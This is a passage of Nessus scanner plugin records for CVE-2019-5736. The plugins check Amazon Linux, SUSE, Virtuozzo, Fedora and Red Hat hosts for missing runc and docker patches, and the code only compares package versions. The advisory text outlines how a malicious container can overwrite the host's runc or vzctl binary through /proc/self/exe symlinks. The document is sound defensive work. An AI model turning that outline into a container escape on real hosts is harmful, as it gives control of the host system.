ALAS-2019-1156.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122096);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"ALAS\", value:\"2019-1156\");\n\n script_name(english:\"Amazon Linux AMI : docker (ALAS-2019-1156)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"A vulnerability was discovered in runc, which is used by Docker to run\ncontainers. runc did not prevent container processes from modifying\nthe runc binary via /proc/self/exe. A malicious container could\nreplace the runc binary, resulting in container escape and privilege\nescalation. This was fixed by creating a per-container copy of\nrunc.(CVE-2019-5736)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2019-1156.html\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Run 'yum update docker' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"docker-18.06.1ce-7.25.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", cpu:\"x86_64\", reference:\"docker-debuginfo-18.06.1ce-7.25.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker / docker-debuginfo\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T14:52:06", "description": "This update for docker-runc fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\navoid write attacks to the host runc binary, which could lead to a\ncontainer breakout (bsc#1121967)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 19, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-14T00:00:00", "title": "SUSE SLES15 Security Update : docker-runc (SUSE-SU-2019:0362-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:docker-runc", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:docker-runc-debuginfo"], "id": "SUSE_SU-2019-0362-1.NASL", "href": "https://www.tenable.com/plugins/nessus/122182", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:0362-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122182);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\"CVE-2019-5736\");\n\n script_name(english:\"SUSE SLES15 Security Update : docker-runc (SUSE-SU-2019:0362-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for docker-runc fixes the following issues :\n\nSecurity issue fixed :\n\nCVE-2019-5736: Effectively copying /proc/self/exe during re-exec to\navoid write attacks to the host runc binary, which could lead to a\ncontainer breakout (bsc#1121967)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1121967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-5736/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20190362-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9ec22170\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Module for Open Buildservice Development Tools\n15:zypper in -t patch\nSUSE-SLE-Module-Development-Tools-OBS-15-2019-362=1\n\nSUSE Linux Enterprise Module for Containers 15:zypper in -t patch\nSUSE-SLE-Module-Containers-15-2019-362=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:docker-runc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-1.0.0rc5+gitr3562_69663f0bd4b6-6.9.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", reference:\"docker-runc-debuginfo-1.0.0rc5+gitr3562_69663f0bd4b6-6.9.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"docker-runc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:49", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - It was discovered that a malicious user logged in to a\n Virtuozzo container could potentially overwrite the\n 'vzctl' binary on the host. The attacker could replace\n executables in that container with symlinks to\n '/proc/self/exe'. After that, 'vzctl exec' called from\n the host to run one of such executables would try to\n run the host's 'vzctl' there instead. If the attacker\n managed to intercept that, they would be able to change\n the contents of the host's 'vzctl' binary. The issue is\n similar to CVE-2019-5736, but affects 'vzctl' rather\n than 'runc'.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 14, "published": "2020-02-04T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2019-008)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2020-02-04T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2019-008.NASL", "href": "https://www.tenable.com/plugins/nessus/133452", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(133452);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2019-008)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerability :\n\n - It was discovered that a malicious user logged in to a\n Virtuozzo container could potentially overwrite the\n 'vzctl' binary on the host. The attacker could replace\n executables in that container with symlinks to\n '/proc/self/exe'. After that, 'vzctl exec' called from\n the host to run one of such executables would try to\n run the host's 'vzctl' there instead. If the attacker\n managed to intercept that, they would be able to change\n the contents of the host's 'vzctl' binary. The issue is\n similar to CVE-2019-5736, but affects 'vzctl' rather\n than 'runc'.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://virtuozzosupport.force.com/s/article/VZA-2019-008\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-37.30-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?78eafaff\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-40.4-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2de194e0\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-43.10-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?644727ce\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-46.7-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fef35233\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-48.2-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1ba11462\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-63.3-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c32b3bf8\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-64.7-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c9b43be6\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-73.24-72.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?20f800a1\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.11.6.vz7.40.4\",\n \"patch\",\"readykernel-patch-40.4-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.17.1.vz7.43.10\",\n \"patch\",\"readykernel-patch-43.10-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.46.7\",\n \"patch\",\"readykernel-patch-46.7-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.21.1.vz7.48.2\",\n \"patch\",\"readykernel-patch-48.2-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.9.1.vz7.63.3\",\n \"patch\",\"readykernel-patch-63.3-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.11.6.vz7.64.7\",\n \"patch\",\"readykernel-patch-64.7-72.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-862.20.2.vz7.73.24\",\n \"patch\",\"readykernel-patch-73.24-72.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-01T02:32:43", "description": "This runc version should fix the keycreate issues on SELinux disabled\nmachines.\n\n----\n\nLatest upstream\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-05-03T00:00:00", "title": "Fedora 29 : 2:runc (2019-6174b47003)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2021-02-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:2:runc"], "id": "FEDORA_2019-6174B47003.NASL", "href": "https://www.tenable.com/plugins/nessus/124570", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-6174b47003.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124570);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/09/23 11:21:10\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"FEDORA\", value:\"2019-6174b47003\");\n\n script_name(english:\"Fedora 29 : 2:runc (2019-6174b47003)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This runc version should fix the keycreate issues on SELinux disabled\nmachines.\n\n----\n\nLatest upstream\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-6174b47003\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected 2:runc package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:2:runc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"runc-1.0.0-92.dev.gitc1b8c57.fc29\", epoch:\"2\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"2:runc\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-11T13:42:15", "description": "An update is now available for Red Hat OpenShift Container Platform\n3.4, 3.5, 3.6, and 3.7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nAll OpenShift Container Platform 3 users are advised to upgrade to\nthese updated packages.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.", "edition": 17, "cvss3": {"score": 8.6, "vector": "AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"}, "published": "2019-02-26T00:00:00", "title": "RHEL 7 : OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 (RHSA-2019:0408)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5736"], "modified": "2019-02-26T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:docker", "p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-debuginfo", "p-cpe:/a:redhat:enterprise_linux:docker-common", "p-cpe:/a:redhat:enterprise_linux:docker-logrotate", "p-cpe:/a:redhat:enterprise_linux:docker-rhel-push-plugin", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:docker-unit-test", "p-cpe:/a:redhat:enterprise_linux:docker-client", "p-cpe:/a:redhat:enterprise_linux:docker-novolume-plugin", "p-cpe:/a:redhat:enterprise_linux:docker-v1.10-migrator"], "id": "REDHAT-RHSA-2019-0408.NASL", "href": "https://www.tenable.com/plugins/nessus/122442", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2019:0408. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122442);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/10\");\n\n script_cve_id(\"CVE-2019-5736\");\n script_xref(name:\"RHSA\", value:\"2019:0408\");\n\n script_name(english:\"RHEL 7 : OpenShift Container Platform 3.4, 3.5, 3.6, and 3.7 (RHSA-2019:0408)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update is now available for Red Hat OpenShift Container Platform\n3.4, 3.5, 3.6, and 3.7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat OpenShift Container Platform is Red Hat's cloud computing\nKubernetes application platform solution designed for on-premise or\nprivate cloud deployments.\n\nSecurity Fix(es) :\n\n* A flaw was found in the way runc handled system file descriptors\nwhen running containers. A malicious container could use this flaw to\noverwrite contents of the runc binary and consequently run arbitrary\ncommands on the container host system. (CVE-2019-5736)\n\nAll OpenShift Container Platform 3 users are advised to upgrade to\nthese updated packages.\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, acknowledgments, and other related information, refer to\nthe CVE page(s) listed in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2019:0408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2019-5736\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-logrotate\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:docker-lvm-plugin\");\n script_set_attribute(attribute:\"cpe\", 